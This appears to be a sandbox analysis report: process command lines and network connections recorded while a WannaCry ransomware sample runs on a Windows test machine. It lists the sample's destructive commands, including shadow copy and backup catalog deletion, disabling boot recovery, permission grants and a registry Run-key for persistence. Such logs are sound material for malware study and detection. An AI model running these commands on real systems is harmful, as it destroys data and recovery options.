"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4840 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4976 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5136 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5532 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5112 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5792 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5932 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5944 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6004 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=3224 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=2132 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6024 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6016 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=5964 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5392 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6044 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4708 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6100 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6152 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=1488 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x370
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=4936 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6528 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6512 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=6868 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7044 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6640 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6636 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6656 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6708 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Users\Admin\Downloads\AnyDesk.exe
"C:\Users\Admin\Downloads\AnyDesk.exe"
C:\Users\Admin\Downloads\AnyDesk.exe
"C:\Users\Admin\Downloads\AnyDesk.exe" --local-service
C:\Users\Admin\Downloads\AnyDesk.exe
"C:\Users\Admin\Downloads\AnyDesk.exe" --local-control
C:\Users\Admin\Downloads\AnyDesk.exe
"C:\Users\Admin\Downloads\AnyDesk.exe" --backend
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=5372 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\cacls.exe
cacls C:\Windows\System32
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Documents\computer.bat" "
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=692 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=6888 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=5800 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=7036 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=3976 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6620 --field-trial-handle=1828,i,8614487002426848502,15558489136748430773,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +h .
C:\Windows\SysWOW64\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 315701717265418.bat
C:\Windows\SysWOW64\cscript.exe
cscript.exe //nologo m.vbs
C:\Windows\SysWOW64\attrib.exe
attrib +h +s F:\$RECYCLE
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b @[email protected] vs
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
TaskData\Tor\taskhsvc.exe
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "grgzzewzdng210" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "grgzzewzdng210" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Music\InstallSplit.rmi"
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\JoinWait.jpe" /ForceBootstrapPaint3D
C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe
"C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\PaintStudio.View.exe" -ServerName:Microsoft.MSPaint.AppX437q68k2qc2asvaagas2prv9tjej6ja9.mca
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
taskdl.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 172.217.169.42:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 195.49.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 145.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | id.google.com | udp |
| GB | 142.250.187.227:443 | id.google.com | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| GB | 216.58.213.22:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | encrypted-tbn0.gstatic.com | udp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| GB | 142.250.178.14:443 | encrypted-tbn0.gstatic.com | tcp |
| US | 8.8.8.8:53 | 22.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| GB | 142.250.178.14:443 | www.youtube.com | tcp |
| GB | 142.250.178.14:443 | www.youtube.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | tcp |
| GB | 216.58.213.6:443 | static.doubleclick.net | tcp |
| GB | 172.217.169.42:443 | jnn-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | encrypted-vtbn0.gstatic.com | udp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.180.14:443 | encrypted-vtbn0.gstatic.com | tcp |
| GB | 142.250.180.14:443 | encrypted-vtbn0.gstatic.com | udp |
| US | 8.8.8.8:53 | 14.180.250.142.in-addr.arpa | udp |
| GB | 142.250.187.227:443 | id.google.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | book.hacktricks.xyz | udp |
| US | 172.64.147.209:443 | book.hacktricks.xyz | tcp |
| US | 172.64.147.209:443 | book.hacktricks.xyz | tcp |
| US | 8.8.8.8:53 | static.gitbook.com | udp |
| US | 172.64.147.209:443 | book.hacktricks.xyz | udp |
| US | 8.8.8.8:53 | integrations.gitbook.com | udp |
| US | 8.8.8.8:53 | whiteintel.io | udp |
| US | 172.64.146.167:443 | integrations.gitbook.com | tcp |
| US | 172.64.146.167:443 | integrations.gitbook.com | tcp |
| US | 172.64.146.167:443 | integrations.gitbook.com | tcp |
| US | 172.64.146.167:443 | integrations.gitbook.com | tcp |
| US | 172.64.146.167:443 | integrations.gitbook.com | tcp |
| US | 172.64.146.167:443 | integrations.gitbook.com | tcp |
| US | 172.64.146.167:443 | integrations.gitbook.com | tcp |
| US | 172.64.146.167:443 | integrations.gitbook.com | tcp |
| US | 172.67.71.52:443 | whiteintel.io | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.152:80 | apps.identrust.com | tcp |
| US | 172.64.146.167:443 | integrations.gitbook.com | udp |
| US | 8.8.8.8:53 | 209.147.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.146.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.71.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.101.63.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| GB | 142.250.187.206:443 | analytics.google.com | tcp |
| BE | 74.125.71.154:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.71.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | app.gitbook.com | udp |
| US | 8.8.8.8:53 | api.gitbook.com | udp |
| US | 104.18.41.89:443 | api.gitbook.com | tcp |
| US | 8.8.8.8:53 | 2783428383-files.gitbook.io | udp |
| US | 172.64.147.209:443 | 2783428383-files.gitbook.io | tcp |
| US | 8.8.8.8:53 | 89.41.18.104.in-addr.arpa | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| GB | 142.250.187.206:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 104.17.2.184:443 | challenges.cloudflare.com | tcp |
| US | 172.67.71.52:443 | whiteintel.io | tcp |
| US | 104.17.2.184:443 | challenges.cloudflare.com | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 184.2.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| GB | 216.58.213.6:443 | static.doubleclick.net | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 142.250.180.1:443 | yt3.ggpht.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | 1.180.250.142.in-addr.arpa | udp |
| US | 172.64.146.167:443 | api.gitbook.com | udp |
| GB | 142.250.187.227:443 | id.google.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.49.195:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| GB | 142.250.178.14:443 | google.com | tcp |
| GB | 142.250.178.14:443 | google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 216.58.213.22:443 | i.ytimg.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn2.gstatic.com | udp |
| US | 8.8.8.8:53 | encrypted-tbn1.gstatic.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| GB | 142.250.200.34:443 | googleads.g.doubleclick.net | udp |
| GB | 172.217.169.42:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.180.14:443 | encrypted-tbn2.gstatic.com | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | anydesk.com | udp |
| GB | 18.244.114.114:443 | anydesk.com | tcp |
| GB | 18.244.114.114:443 | anydesk.com | tcp |
| GB | 18.244.114.114:443 | anydesk.com | tcp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | ad-wa.anydesk.com | udp |
| GB | 142.250.180.3:443 | www.recaptcha.net | tcp |
| DE | 167.235.224.171:443 | ad-wa.anydesk.com | tcp |
| DE | 167.235.224.171:443 | ad-wa.anydesk.com | tcp |
| US | 8.8.8.8:53 | 114.114.244.18.in-addr.arpa | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 8.8.8.8:53 | tracking.g2crowd.com | udp |
| US | 104.19.177.52:443 | cdn.cookielaw.org | tcp |
